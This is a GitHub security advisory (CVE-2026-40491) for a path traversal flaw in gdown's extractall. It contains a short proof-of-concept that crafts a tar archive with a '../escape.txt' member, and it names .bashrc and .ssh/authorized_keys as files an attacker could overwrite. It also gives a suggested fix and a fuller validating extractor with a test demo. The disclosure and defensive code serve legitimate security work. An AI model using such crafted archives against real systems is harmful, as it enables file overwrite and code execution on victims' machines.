gdown Affected by Arbitrary File Write via Path Traversal in gdown.extractall

Moderate severity GitHub Reviewed Published Apr 12, 2026 in wkentaro/gdown • Updated Apr 24, 2026

Package

gdown (pip)

Affected versions

<= 5.2.1

Patched versions

5.2.2

Description

Summary

The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allows files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).

Details

The vulnerability exists in gdown/extractall.py within the extractall() function. The function takes an archive path and a destination directory (to), then calls the underlying extractall() method of Python's tarfile or zipfile modules without validating whether the archive members stay within the to boundary.

Vulnerable Code:

# gdown/extractall.py
def extractall(path, to=None):
    # ... (omitted) ...
    with opener(path, mode) as f:
        f.extractall(path=to)  # Vulnerable: No path validation or filters

Even on modern Python versions (3.12+), if the filter parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.

PoC

Steps to Reproduce

  1. Create the Malicious Archive (poc.py):

import tarfile
import io
import os

# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)

# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
    # Target: escape the subfolder and write to the parent 'safe_target'
    payload = tarfile.TarInfo(name="../escape.txt")
    content = b"Path Traversal Success!"
    payload.size = len(content)
    tar.addfile(payload, io.BytesIO(content))

print("[+] evil.tar created.")

  2. Execute the Vulnerable Function:

python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"

  3. Verify the Escape:

ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt

Impact

An attacker can provide a specially crafted archive that, when extracted via gdown, overwrites critical files on the victim's system.

  • Arbitrary File Overwrite: Overwriting .bashrc, .ssh/authorized_keys, or configuration files.
  • Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.

Recommended Mitigation

Implement path validation to ensure that all extracted files are contained within the target directory.

Suggested Fix:

import os
import tarfile

def is_within_directory(directory, target):
    # Compare absolute, normalised paths so that "../" components are
    # resolved before the containment check.
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return os.path.commonpath([abs_directory, abs_target]) == abs_directory

# Inside extractall.py
with opener(path, mode) as f:
    if isinstance(f, tarfile.TarFile):
        # Validate every member before anything is written to disk
        for member in f.getmembers():
            member_path = os.path.join(to, member.name)
            if not is_within_directory(to, member_path):
                raise Exception("Attempted Path Traversal in Tar File")
    f.extractall(path=to)
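A fuller version of this check, written here as an added example and not code from gdown or its maintainers: it validates every member of both tar and zip archives before anything is written, also checks the targets of tar symlinks and hardlinks, and builds constructed archives (one benign, one carrying the ../escape.txt member from the PoC above) to show that the traversal is refused and the parent directory stays untouched. The names safe_extractall, _check_member, PathTraversalError, build_tar, build_zip and demo are this example's own and are not gdown API.

```python
import io
import os
import tarfile
import tempfile
import zipfile


class PathTraversalError(Exception):
    """Raised when an archive member would land outside the destination."""


def _is_within_directory(directory, target):
    # realpath resolves ".." and any symlinked parents; the member must then
    # be the destination itself or something below it.
    abs_directory = os.path.realpath(directory)
    abs_target = os.path.realpath(target)
    try:
        return os.path.commonpath([abs_directory, abs_target]) == abs_directory
    except ValueError:  # e.g. different drives on Windows
        return False


def _check_member(to, name, linkname=None):
    """Reject a member name (and, for tar links, its target) that escapes `to`."""
    if os.path.isabs(name) or not _is_within_directory(to, os.path.join(to, name)):
        raise PathTraversalError(f"member {name!r} escapes {to!r}")
    if linkname is not None:
        # A link target is interpreted relative to the member's own directory.
        link_target = os.path.join(to, os.path.dirname(name), linkname)
        if os.path.isabs(linkname) or not _is_within_directory(to, link_target):
            raise PathTraversalError(f"link {name!r} -> {linkname!r} escapes {to!r}")


def safe_extractall(path, to=None):
    """Extract a .tar or .zip archive into `to`, validating all members first."""
    to = os.path.abspath(to or os.getcwd())
    os.makedirs(to, exist_ok=True)
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            for info in zf.infolist():
                _check_member(to, info.filename)
            zf.extractall(path=to)
    elif tarfile.is_tarfile(path):
        with tarfile.open(path) as tf:
            for m in tf.getmembers():
                link = m.linkname if (m.issym() or m.islnk()) else None
                _check_member(to, m.name, link)
            # Python 3.12+ ships a "data" filter; use it as a second layer.
            kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
            tf.extractall(path=to, **kwargs)
    else:
        raise ValueError(f"unsupported archive: {path}")
    return sorted(os.listdir(to))


def build_tar(path, members):
    """Write a tar archive from {name: bytes}; constructed test input only."""
    with tarfile.open(path, "w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))


def build_zip(path, members):
    """Write a zip archive from {name: bytes}; constructed test input only."""
    with zipfile.ZipFile(path, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)


def demo():
    """Return (benign listing, tar rejected, zip rejected, parent untouched)."""
    with tempfile.TemporaryDirectory() as work:
        dest = os.path.join(work, "safe_target", "subfolder")
        benign = os.path.join(work, "benign.tar")
        build_tar(benign, {"ok.txt": b"hello"})
        listing = safe_extractall(benign, to=dest)

        evil_tar = os.path.join(work, "evil.tar")
        build_tar(evil_tar, {"../escape.txt": b"x"})  # same member as the PoC
        evil_zip = os.path.join(work, "evil.zip")
        build_zip(evil_zip, {"../escape.txt": b"x"})
        rejected = []
        for archive in (evil_tar, evil_zip):
            try:
                safe_extractall(archive, to=dest)
                rejected.append(False)
            except PathTraversalError:
                rejected.append(True)
        escaped = os.path.exists(os.path.join(work, "safe_target", "escape.txt"))
        return listing, rejected[0], rejected[1], not escaped


if __name__ == "__main__":
    print(demo())
```

Checking every member before calling extractall matters: validating each entry only as it is written would let an earlier symlink member redirect a later file outside the destination, which is why link targets are checked too. On Python 3.12 and later the block additionally passes filter="data", the interpreter's own protection (the default from 3.14); the explicit check keeps older interpreters at the same level.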

References

@wkentaro wkentaro published to wkentaro/gdown Apr 12, 2026
Published to the GitHub Advisory Database Apr 14, 2026
Reviewed Apr 14, 2026
Published by the National Vulnerability Database Apr 18, 2026
Last updated Apr 24, 2026

Severity

Moderate


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(28th percentile)

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

CVE-2026-40491

GHSA ID

GHSA-76hw-p97h-883f
